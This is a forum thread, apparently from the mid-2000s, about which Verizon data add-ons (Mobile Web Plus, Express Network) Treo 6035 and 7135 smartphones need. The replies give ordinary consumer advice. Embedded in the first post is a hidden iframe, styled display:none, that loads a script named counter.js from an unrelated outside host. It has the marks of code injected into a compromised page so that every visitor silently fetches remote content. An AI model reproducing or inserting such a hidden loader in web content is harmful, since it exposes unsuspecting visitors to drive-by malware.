Forgive me for being ignorant about such issues, but what additional add ons to service are required for full functionality of Smart phones.
Iam currently on an Americas Choice family plan.
Will I need to add:
-Mobile Web Plus, $9.95
-(or) Express network $+++.++
What does express network add that Mobile Web Plus doesnt have, high speed??
Will I need to add these charges for eack smartphone on the family plan?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
My understand is that you don't need Mobile Web Plus with the 6035 unless you want to use the WAP browser. The WAP browser isn't necessary since the 6035 has quite a few web browsers available for it (EudoraWeb, Xiino, Blazer, ...).
Express Network is high speed access which you don't need for the 6035 because it can't take advantage of it. Only certain phones will support the faster speeds, so that's what decides whether you need it or not.
For the 7135, you would require the Express Network option if you want the faster internet connection. From what I've read, right now Verizon hasn't completed deployment of the higher speed network, and therefore allows you to still use the slower connection for now.

For just making a data call you don't need any extra features from Verizon with the 6035.

Back when I had Verizon and my 6035, I used Mobile Web Plus. The main reason I did was that I had previously used Omnisky's wireless mail and portal service, really liked it, and once Verizon came out with MWP, which was a rebranding of the Omnisky service.
In a nutshell, MWP is (was? - is still out there?) basically access to various POP mail accounts (up to 6 as I recall), a bunch of quasi-custom portal content (which you can basically get on your own with any number of Palm-oriented web clipping sites), and a Verizon branded version of the Blazer browser. It did have some neat things like the ability to search for residential or business listings, and then either dial the entry that was found, or save it to the address book.
Bottom line - think of Mobile Web Plus as a 'My Yahoo' for the phone - it just organizes what's out there, in one place, for simplicity's sake. Nothing you can't get on your own, if you work at it.
